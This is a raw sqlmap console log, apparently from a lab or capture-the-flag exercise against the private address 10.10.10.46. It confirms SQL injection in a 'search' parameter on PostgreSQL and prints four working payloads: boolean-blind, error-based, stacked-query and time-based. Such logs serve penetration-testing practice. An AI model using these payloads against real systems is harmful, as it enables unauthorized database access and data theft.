        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:36:25 /2020-07-22/

[20:36:25] [INFO] resuming back-end DBMS 'postgresql' 
[20:36:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=a' AND (SELECT (CASE WHEN (4443=4443) THEN NULL ELSE CAST((CHR(69)||CHR(71)||CHR(110)||CHR(74)) AS NUMERIC) END)) IS NULL-- kdUJ

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=a' AND 8582=CAST((CHR(113)||CHR(122)||CHR(122)||CHR(122)||CHR(113))||(SELECT (CASE WHEN (8582=8582) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(113)||CHR(118)||CHR(113)) AS NUMERIC)-- QSOp

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=a';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=a' AND 7151=(SELECT 7151 FROM PG_SLEEP(5))-- tRzR
---
[20:36:26] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[20:36:26] [INFO] fetched data logged to text files under '/home/kyb3r/.local/share/sqlmap/output/10.10.10.46'

[*] ending @ 20:36:26 /2020-07-22/

